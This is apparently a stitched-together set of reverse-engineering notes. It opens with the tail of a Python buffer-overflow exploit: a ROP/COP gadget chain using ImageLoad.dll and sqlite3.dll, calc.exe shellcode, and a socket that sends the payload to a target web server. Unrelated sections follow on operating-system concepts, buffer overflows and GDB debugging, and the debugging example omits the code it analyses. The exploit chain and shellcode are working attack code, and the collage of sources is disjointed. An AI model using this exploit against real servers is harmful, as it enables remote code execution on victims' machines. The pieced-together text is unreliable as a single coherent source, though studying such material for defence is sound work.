crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
# Pointing EAX (shellcode location) to data inside of ECX (lpBuffer placeholder) (NOPs before
# shellcode)
crash += struct.pack('<L', 0x1001fce9) # pop esi ; add esp, 0x8 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xfffffd44) # Shellcode is about negative 0xfffffd44 bytes away from EAX
crash += struct.pack('<L', 0x10022f45) # sub eax, esi ; pop edi ; pop esi ; ret
crash += struct.pack('<L', 0x10021bfb) # mov dword [ecx+0x8], eax ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001c31e) # add esp, 0x8 ; ret: ImageLoad.dll (non-ASLR enabled module) (Returns to stack after COP gadget)
crash += struct.pack('<L', 0x10022c4c) # xor edx, edx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
# Need to first extract sqlite3.dll pointer (which is a pointer to kernel32) and then calculate
# offset from kernel32!GetStartupInfoA
# Decrementing ECX by 0x14 firstly (parameter is 0xc bytes in front of ECX. Subtracting ECX by
# 0xC to place placeholder in ECX. Additionally, the overwrite gadget writes to ECX at an offset of
# ECX+0x8. Adding 0x8 more bytes to compensate.)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
# EDI still contains return to stack ROP gadget for COP gadget compensation
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x10015ce5) # sub eax, edx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1002248c) # mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1002248c) # mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)
# Popping 0xfffffd2d into EBX (which will be transferred into EDX. After value is in EDX, it will be added to EAX via EDX)
crash += struct.pack('<L', 0x10022c4c) # xor edx, edx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x10022c1e) # add edx, ebx ; pop ebx ; retn 0x10: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x10015ce5) # sub eax, edx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x90909090) # Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090) # Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090) # Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090) # Compensation for retn 0x10 in previous ROP gadget
# Writing kernel32!WriteProcessMemory address to kernel32!WriteProcessMemory parameter placeholder
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x10021bfb) # mov dword [ecx+0x8], eax ; ret: ImageLoad.dll (non-ASLR enabled module)
# Increasing ECX by 8 bytes, moving it into EAX, and then exchanging EAX with ESP to fire off the ROP chain!
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001fa0d) # mov eax, ecx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c07ff8) # xchg eax, esp ; ret: sqlite3.dll (non-ASLR enabled module)
# calc.exe
# 195 bytes
crash += ("\x89\xe5\x83\xec\x20\x31\xdb\x64\x8b\x5b\x30\x8b\x5b\x0c\x8b\x5b"
"\x1c\x8b\x1b\x8b\x1b\x8b\x43\x08\x89\x45\xfc\x8b\x58\x3c\x01\xc3"
"\x8b\x5b\x78\x01\xc3\x8b\x7b\x20\x01\xc7\x89\x7d\xf8\x8b\x4b\x24"
"\x01\xc1\x89\x4d\xf4\x8b\x53\x1c\x01\xc2\x89\x55\xf0\x8b\x53\x14"
"\x89\x55\xec\xeb\x32\x31\xc0\x8b\x55\xec\x8b\x7d\xf8\x8b\x75\x18"
"\x31\xc9\xfc\x8b\x3c\x87\x03\x7d\xfc\x66\x83\xc1\x08\xf3\xa6\x74"
"\x05\x40\x39\xd0\x72\xe4\x8b\x4d\xf4\x8b\x55\xf0\x66\x8b\x04\x41"
"\x8b\x04\x82\x03\x45\xfc\xc3\xba\x78\x78\x65\x63\xc1\xea\x08\x52"
"\x68\x57\x69\x6e\x45\x89\x65\x18\xe8\xb8\xff\xff\xff\x31\xc9\x51"
"\x68\x2e\x65\x78\x65\x68\x63\x61\x6c\x63\x89\xe3\x41\x51\x53\xff"
"\xd0\x31\xc9\xb9\x01\x65\x73\x73\xc1\xe9\x08\x51\x68\x50\x72\x6f"
"\x63\x68\x45\x78\x69\x74\x89\x65\x18\xe8\x87\xff\xff\xff\x31\xd2"
"\x52\xff\xd0")
http_request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.130", 80))
s.send(http_request)
s.close()
https://connormcgarr.github.io/ROP2/
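The chain above is assembled from little-endian DWORDs produced by struct.pack('<L', ...). As a minimal Python 3 sketch (the listing itself is Python 2), the layout rules for a single gadget can be written down as follows. The helper names p32 and gadget_block, the filler value, and the addresses 0x11111111 and 0x22222222 are assumptions made for illustration; they are not part of the original exploit.

```python
import struct

def p32(value):
    """Pack a 32-bit value as a little-endian DWORD, like struct.pack('<L', ...) above."""
    return struct.pack('<L', value)

def gadget_block(gadget, next_gadget, popped=(), retn_bytes=0, filler=0x90909090):
    """Return the stack layout consumed by one gadget (hypothetical helper).

    Order on the stack:
      1. the gadget's own address,
      2. one DWORD for every `pop` the gadget executes,
      3. the address its final `ret`/`retn` transfers control to,
      4. `retn N` padding, because `retn N` pops the return address first
         and only then adds N to ESP.
    """
    if retn_bytes % 4:
        raise ValueError("retn padding is emitted in whole DWORDs")
    block = p32(gadget)
    for value in popped:
        block += p32(value)
    block += p32(next_gadget)
    block += p32(filler) * (retn_bytes // 4)
    return block

# Hypothetical gadget "pop ebx ; retn 0x10" at 0x11111111, followed by 0x22222222.
block = gadget_block(0x11111111, 0x22222222, popped=(0xfffffd2d,), retn_bytes=0x10)
print(block.hex())
```

The point of the sketch is the ordering: padding for a retn 0x10 goes after the next gadget's address, not directly after the gadget that contains the retn.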
Rop Decode
https://www.blackhat.com/docs/us-15/materials/us-15-Xenakis-ROPInjector-Using-Return-
Oriented-Programming-For-Polymorphism-And-Antivirus-Evasion-wp.pdf
https://www.ndss-symposium.org/ndss2015/ndss-2015-posters/korean-shellcode-rop-based-
decoding/
Reverse Engineering
https://www.youtube.com/playlist?list=PLMB3ddm5Yvh3gf_iev78YP5EPzkA3nPdL
When the term “operating system” is used, it usually refers to computer software like
macOS, Windows, or a Linux distribution. While this isn’t incorrect, a more accurate
definition of an OS is the software of a computer which runs in kernel mode, where the CPU
can use every feature of its available hardware and execute every instruction in its instruction
set. The OS manages all hardware and software resources, giving computer programs a clean,
abstract set of tools to use. In other words, its main function is managing the Input/Output
devices and other system resources to provide its users with an extended (i.e., virtual)
machine.
In the world of computer science and computer engineering education, Operating Systems is
the name of a course which focuses on topics like the stack and the heap, buffer overflow,
system calls, multiprogramming, parallel programming, scheduling, and more. It’s innately
frustrating not just because of its abstract subject material, but also because of how time-
consuming and confusing it can be to debug the kernel in a VM as opposed to developing and
running a high-level C++ program in a more user-friendly IDE. However, in OS there are still
important concepts to learn that are extremely relevant for reverse engineering and malware
analysis.
The following is a collection of information I’ve gathered from when I took an OS class in
undergrad as well as notes from Dennis Yurichev’s famous book on RE, “Reverse Engineering for
Beginners”.
In my Crash Course for Assembly Language, I covered the Stack in general terms; now let’s go
into more detail and compare it to the Heap. This was something I was asked to do in an
interview, so it may be something you could be asked as well if you’re looking for a position in
RE.
To reiterate:
Each active function call has a frame that stores the values of all local variables, and the frames
of all active functions are maintained on the Stack. The Stack is a very important data structure
in memory. In general, it is used to store temporary data needed during the execution of a
program, like local variables and parameters, function return addresses, and more. Stack
memory is managed automatically: the layout of each frame is fixed at compile time, and frames
are pushed and popped as functions are called and return, so the program does not allocate or
free them by hand. Dynamic memory, like that allocated with malloc() or the new operator, is
stored on the Heap.
So the Stack holds local (automatic) variables and parameters, which are pushed onto it
when you make procedure calls. This covers pretty much anything outside of the global scope
except what is allocated on the Heap with malloc(). The computer knows which instruction to
execute when returning from a procedure because the call pushed the return address onto the
Stack, and the return pops it.
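The Heap is dynamic memory (as mentioned above): a region from which blocks are requested
and released explicitly at runtime. Global variables do not live on the Heap (they sit in the
program's data segments), but Heap blocks can be reached from anywhere in the program through
pointers. The Heap is not managed automatically by the CPU and, unlike the Stack, can
become fragmented as blocks of memory are allocated and then freed.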
• Structure: the Stack is LIFO whereas the Heap imposes no ordering; blocks are allocated
and freed in any order (the memory Heap is unrelated to the heap data structure used for
priority queues)
• Memory: the Stack is contiguous and will never become fragmented, whereas Heap
memory is allocated in any order and is susceptible to fragmentation
• Variables: the Stack only contains local variables and parameters, while Heap data can be
reached from any function that holds a pointer to it
System Calls
https://www.linuxbnb.net/wp-content/uploads/2018/06/system-call-overview-1.png
A system call allows a user process to request OS services that execute inside the kernel. User
programs use syscalls to invoke these services, and common UNIX syscalls include:
• Exec: performs file name resolution, overwrites the current process’s memory space,
resets the program counter, and starts a new program
The syscall handler knows which syscall is being made from the syscall ID that the caller
places in a particular register. The ID is an index into the system call table, whose entries are
function pointers to the routines that implement each syscall.
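The table lookup described above can be sketched as follows. This is a simplified model, not kernel code: the handler names, the two-entry table, the use of "eax" for the syscall ID, and the -1 error value are assumptions chosen for illustration.

```python
def sys_getpid(state):
    """Hypothetical handler: return the caller's process ID."""
    return state["pid"]

def sys_write(state, fd, data):
    """Hypothetical handler: record data written to a file descriptor."""
    state["output"].setdefault(fd, []).append(data)
    return len(data)

# The syscall table: the syscall ID is simply an index into this list,
# and each entry plays the role of a function pointer.
SYSCALL_TABLE = [sys_getpid, sys_write]

def syscall_handler(state, registers):
    """Dispatch on the syscall ID found in a register (assumed to be eax here)."""
    number = registers["eax"]
    if not 0 <= number < len(SYSCALL_TABLE):
        return -1  # stands in for an "unknown syscall" error
    handler = SYSCALL_TABLE[number]
    return handler(state, *registers.get("args", ()))

state = {"pid": 42, "output": {}}
print(syscall_handler(state, {"eax": 0}))
print(syscall_handler(state, {"eax": 1, "args": (1, b"hi")}))
```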
Adding a new system call to the kernel involves modifying a specific set of files like the syscall
table, sys.c (for syscall function declarations), and the schedule header file. It is a common task
for students in an OS course, but unfortunately not well documented and often takes many hours
to figure out. I may one day in the future post clear instructions on how to do this to save future
students all the trouble, but the above overview will give you a conceptual understanding for
RE.
Buffer Overflow
https://www.imperva.com/learn/wp-content/uploads/sites/13/2018/01/buffer-overflow.png
A buffer is a contiguous section of memory which temporarily holds data while it is transferred,
for example to or from an input or output device, compensating for differences in speed.
Buffer Overflow (or Buffer Overrun) occurs when an application tries to store more data in
the buffer than it can hold, which leads to data overflowing into adjacent storage and overwriting
whatever was there. This can cause data loss or a crash. It is a common programming
mistake that developers often make unknowingly, and attackers can exploit it to
read sensitive data or take over the program's control flow.
In a buffer overflow attack, the attacker supplies extra data that can include malicious
instructions to perform activities like executing shellcode, corrupting files, changing data, etc.
There are two types of buffer overflow attacks: those involving Stack-based memory allocation
(which are simpler to exploit), and those that involve Heap-based memory allocation, which are
harder to exploit and less frequent. Languages that do not check array bounds automatically
(like C, C++, Fortran, and Assembly) are the most vulnerable to buffer overflow exploitation.
Common ways to prevent buffer overflows include:
• Size Allocation: to ensure the buffer has enough memory to handle large volumes of
data
• Avoidance of certain library functions: or third-party methods that are not
bounds-checked for buffer overflows, such as gets(), scanf(), or strcpy() found in the C/C++
programming languages
When a program is loaded into memory, it becomes one or more running processes, and
processes are typically independent of each other. Threads, on the other hand, exist as a
subset of a process and therefore share the memory of the process they belong to. Both can be
used for parallel programming, which refers to multiple processes or threads
being executed at the same instant (which is only possible on a system with multiple processors
or cores). On a single processor, the CPU is shared among running processes using process
scheduling. This is concurrency, not parallel programming.
Multiprogramming is the rapid switching of the CPU between multiple processes in memory. It
is commonly used to keep the CPU busy while one or more processes are doing I/O, since only
one program at a time can use the CPU for executing its instructions. The main idea of
multiprogramming is to maximize the use of CPU time and to let the user run multiple
programs that appear to execute at the same time.
Without DMA (Direct Memory Access), the CPU itself has to move the data during every I/O
transfer, so it is not free to run another program in the meantime and programs effectively run
one after another. This leads to a backup, since one has to finish before the other can
be started, and multiprogramming brings little benefit. A related concept is the time-sharing
system, in which multiple users can access and perform
computations simultaneously using their own terminals. All time-sharing systems are
multiprogramming systems, but not all multiprogramming systems are time-sharing systems
since a multiprogramming system may run on a PC with only one user.
There is also spooling, which is a combination of buffering and queuing, and a form of
multiprogramming for the purpose of copying data between devices. It allows programs to
“hand off” work to be done by the peripheral and then proceed to other tasks.
To summarize, even if several programs are loaded in main memory, only one of them can
use the CPU at a time on a single processor, so multiprogramming maximizes the use of CPU time
by rapidly switching between programs.
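The switching summarized above can be sketched with a round-robin loop in which each program runs one step and then gives up the CPU. This is a toy model under stated assumptions: the program and round_robin names are hypothetical, generators stand in for processes, and a real scheduler switches on timer interrupts and I/O waits rather than after every step.

```python
from collections import deque

def program(name, steps):
    """A toy program: each yield is one slice of CPU time."""
    for i in range(steps):
        yield f"{name}:{i}"

def round_robin(programs):
    """Give each ready program one step in turn until all have finished."""
    ready = deque(programs)
    timeline = []
    while ready:
        current = ready.popleft()
        try:
            timeline.append(next(current))   # run one slice
        except StopIteration:
            continue                         # program finished, drop it
        ready.append(current)                # back to the end of the queue
    return timeline

print(round_robin([program("A", 2), program("B", 3)]))
# → ['A:0', 'B:0', 'A:1', 'B:1', 'B:2']
```

Only one program runs at any instant, yet both make progress, which is the effect multiprogramming is after.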
Multiprocessing refers to executing multiple processes at the same time, which sounds quite
similar to multiprogramming, but the difference is that multiprocessing refers to the
hardware (i.e. the CPUs). A system can be both multiprogrammed and multiprocessing by
having several programs running simultaneously with more than one physical processor.
Multitasking, much like its general definition unrelated to computing, refers to having multiple
tasks (programs, processes, threads, etc.) running at the same time. It’s used in modern
operating systems when multiple tasks share a common processing resource (like CPU and
memory). At any instant a single CPU executes only one task while the other tasks wait their
turn. The illusion of parallelism is achieved by rapidly reassigning the CPU to another task
(i.e. process or thread context switching).
Multithreading is a model of execution that allows a single process to have multiple code
segments (i.e. threads) run concurrently within that process. Threads are similar to child
processes that share the parent process resources but execute independently. Multiple
threads of a single process can share the CPU in a single CPU system or run in parallel in a
multiprocessing system. Because threads share memory, their access to shared data usually has
to be synchronized with OS primitives like mutexes and semaphores.
Multithreading is a good choice when a server has a number of distinct tasks to be performed
concurrently.
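A minimal sketch of threads sharing memory and synchronizing with a mutex, using Python's threading module. The run_workers function and its parameters are hypothetical; threading.Lock plays the role of the mutex.

```python
import threading

def run_workers(n_threads=4, increments=10000):
    """Start n_threads threads that all increment one shared counter."""
    counter = 0
    lock = threading.Lock()          # the mutex protecting the shared counter

    def worker():
        nonlocal counter
        for _ in range(increments):
            with lock:               # only one thread may update at a time
                counter += 1

    threads = [threading.Thread(target=worker) for _ in range(n_threads)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()                     # wait for every thread to finish
    return counter

print(run_workers(4, 1000))
```

All threads see the same counter because they live in the same process; the lock makes each read-modify-write step atomic with respect to the other threads.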
Miscellaneous
• Paging: makes allocation and free space management easier. A page fault occurs
when a program accesses a page of memory that is not currently in RAM
• Trap instruction: an instruction which causes a switch from user
mode to kernel mode, starting execution at a fixed address in the kernel. It transfers
control to the OS (which then carries out the syscall) before control returns to the
instruction following the trap
• Pipe: can be used to connect two processes so the output from one becomes the input
of the other. Pipes are FIFO and useful for inter-process communication
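The FIFO behaviour of a pipe can be seen with os.pipe(). To keep the sketch short and self-contained, both ends are used inside a single process and only small messages are written; in practice the write end and the read end would belong to two different processes. The pipe_roundtrip function name is hypothetical.

```python
import os

def pipe_roundtrip(messages):
    """Write messages into a pipe, then read them back in the same order."""
    read_fd, write_fd = os.pipe()
    # Closing the write end (done by the with-block) lets the reader see end-of-file.
    with os.fdopen(write_fd, "wb") as writer:
        for message in messages:
            writer.write(message + b"\n")
    with os.fdopen(read_fd, "rb") as reader:
        return reader.read().splitlines()

print(pipe_roundtrip([b"first", b"second", b"third"]))
```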
https://medium.com/reverse-engineering-for-dummies/learning-operating-systems-for-
reverse-engineering-a723dbb5cd6f
https://www.youtube.com/watch?v=U2QVyaufWV4
https://www.immunityinc.com/products/debugger/
https://www.youtube.com/watch?v=eX6rcAIw6s8
This tutorial intends to be beneficial to all developers who want to create reliable and fault-
free software.
A debugger runs another program under its control and allows the programmer to pause it,
step through it, and inspect its variables to find the cause of an issue.
GDB enables us to execute the program until it reaches a specific point. It can then output the
contents of selected variables at that moment, or walk through the program line by line and
print the values of every parameter after every line executes. It has a command-line interface.
To install GDB on a Linux system, use the distribution's package manager.
The code I am using for an example here is calculating factorial numbers inaccurately. The aim
is to figure out why the issue occurred.
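#include <iostream>
using namespace std;
long factorial(int n);  // the buggy definition examined below is not reproduced here
int main() {
int n(0);
cin>>n;
long val=factorial(n);
cout<<val;
return 0;
}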
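GCC is the standard compiler suite on Linux and ships with most distributions. Use the "g++"
command to compile the source code "test.cpp" into an executable "main". Pass the "-g" flag so
the binary carries debug information and can be debugged later (for example, g++ -g test.cpp -o
main).
The commands "next" and "step" in GDB execute the code line by line; "next" steps over
function calls while "step" enters them.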
Using “watchpoints” is akin to requesting the debugger to give you a constant stream of
information about any modifications to the variables. The software stops when an update
happens and informs you of the specifics of the change.
Here, we set the watchpoints for the calculation's outcome and the input value as it fluctuates.
Last, the results of the watchpoints are analyzed to identify any abnormal activity.
Notice the "old" and "new" values GDB reports for the result. To keep following the change in
values, press the Enter key, which repeats the previous command.
Multiplying the previous value of the result by the current "n" value gives 2. The
first bug has been spotted!
For an input of 3, it should compute the outcome by multiplying 3 * 2 * 1. However, the
multiplication here begins at 2. We'll have to alter the loop a little to fix that.
The result is now 0. Another bug!
Once the result has been multiplied by 0, it can never hold the factorial value again, so the
loop must halt before "n" reaches 0.
When "n" drops to -1, the loop no longer executes and the function returns. Notice that
when a variable goes out of scope, GDB deletes its watchpoint.
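The values seen at the watchpoints can be reproduced with a small model. The source does not show the body of factorial, so the sketch assumes a loop of the form while(n--) result *= n, which is consistent with the values described (result becomes 2, then 0, and "n" ends at -1) but remains an assumption. The function names and the trace list are hypothetical.

```python
def buggy_factorial(n, trace=None):
    """Model of the assumed buggy loop `while (n--) result *= n;` (n >= 0)."""
    result = 1
    while True:
        old_n = n
        n -= 1                 # `n--`: test the old value, then decrement
        if old_n == 0:
            break
        old = result
        result *= n            # multiplies by the already decremented n
        if trace is not None and result != old:
            trace.append((old, result))   # what a watchpoint on result reports
    return result

def fixed_factorial(n):
    """Multiply before decrementing and stop before n reaches 0."""
    result = 1
    while n > 0:
        result *= n
        n -= 1
    return result

changes = []
print(buggy_factorial(3, changes), changes)
print(fixed_factorial(3))
```

For an input of 3 the model records two changes, from 1 to 2 and from 2 to 0, matching the two bugs found in the walkthrough.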
Examining local variables to determine whether anything unusual has happened might help
you locate the problematic section of your code. Since GDB stops at a line before executing it,
"val" has not been assigned yet and the "print val" command returns a garbage value.
To fully comprehend what the debugger is doing, examine the assembly code and what is
happening in memory.
Use the "disass" command to output the list of Assembly instructions. GDB's default
disassembly style is AT&T, which may be unfamiliar to readers used to the Intel syntax common
in Windows tooling. If you prefer Intel syntax, the disassembly style can be changed.
Execute the "set disassembly-flavor intel" command to change to the Intel disassembly style.
The logic flow is critical to the success of any program. The flow of Assembly code can be
simple or complicated, based on the compiler and settings used during compiling.
https://medium.com/@securosoft/basic-reverse-engineering-using-gdb-ebfb0afca8f4
https://medium.com/@rickharris_dev/reverse-engineering-using-linux-gdb-a99611ab2d32
https://www.youtube.com/watch?v=nLp3hr6Jf2M
https://www.youtube.com/watch?v=mYY6xHBo4zg
The GNU Debugger or GDB is a powerful debugger which allows for step-by-step execution of a
program. It can be used to trace program execution and is an important part of any reverse
